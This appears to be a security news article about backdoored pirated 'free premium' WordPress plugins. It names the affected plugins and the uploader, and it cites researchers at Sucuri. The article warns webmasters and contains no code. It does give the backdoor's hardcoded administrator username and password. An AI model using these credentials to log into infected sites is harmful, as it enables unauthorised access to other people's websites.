Cybercrooks Hijacking WordPress Sites Through Malicious Free Premium Plugins
It is just about everyday hackers take to the internet to hijack or attack websites just because they can. In one of the latest string of website attacks, cybercriminals are targeting WordPress sites with free premium plugins running on the ever-so-popular and free content management software.
For years, WordPress has been a champion of open source blogging tools and content management system software. The easy of usability and utilization of PHP and MySQL make WordPress an attractive choice for easily creating and maintaining a website or blog. To make sites using WordPress even better and stand out among the millions of other web pages on the internet, there is a multitude of templates and plugins that may be used to spruce up the look of a site or add additional functionality. Unfortunately, it is the added functionality from various free premium plugins that has gained the attention of cybercrooks who are attacking sites using them.
There are several sites that offer premium WordPress plugins at no cost, but some of them include code to allow attackers to exploit the website using it or login and have unadulterated access to a specific site. Many of these claimed-to-be free premium WordPress plugins are knock-off versions of other plugins that have a price associated to it for use.
Security experts have found where these plagiarized free premium WordPress plugins were created by a hacker who looks to exploit a vulnerability that the plugin causes once installed on a website. Many of these fake plugins offered as free premium plugins are able to reset the administrator access to use the username "wordpress" and password "gh67io9Cjm."
Some of these malicious plugins, recently identified as Restrict Content Pro WordPress Plugin V1.5.5, Ideas! v1.1.6, Ultimate Ajax Grid, User Profiles, and UberMenu – Flat Skin Pack V1.0.3, all contain malicious code from a specific user called "andrewp." Found through the site wplist.org, the researchers at Sucuri have found other users similar to "andrewp" who have uploaded rogue plugins in the past two months. These plugins so far have been identified as Go – Responsive Pricing & Compare Tables (go_pricing), FormCraft, Custom Scrollbar WordPress, Theia Sticky Sidebar and GravityForms.
Security researcher Denis Sinegubko from Unmask Parasites noted "Our conclusion is that this practice of posting plugins containing malicious code is typical for these sites. Moreover, when in their very own comments area people warn about malicious 'extras' they have found in the plugins, the admin readily replaces them with 'retail' versions."
For the most part webmasters who seek free plugins for their WordPress sites use them because they do not want to spend the extra money for added functions. In other cases it is the lack of experience that places webmasters in a bind when they find a plugin that they think is the right one, which is an added bonus if it does not cost them anything extra. Unfortunately, in these cases the webmaster ends up being attacked by the cybercrook who created the alleged free premium WordPress plugin.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.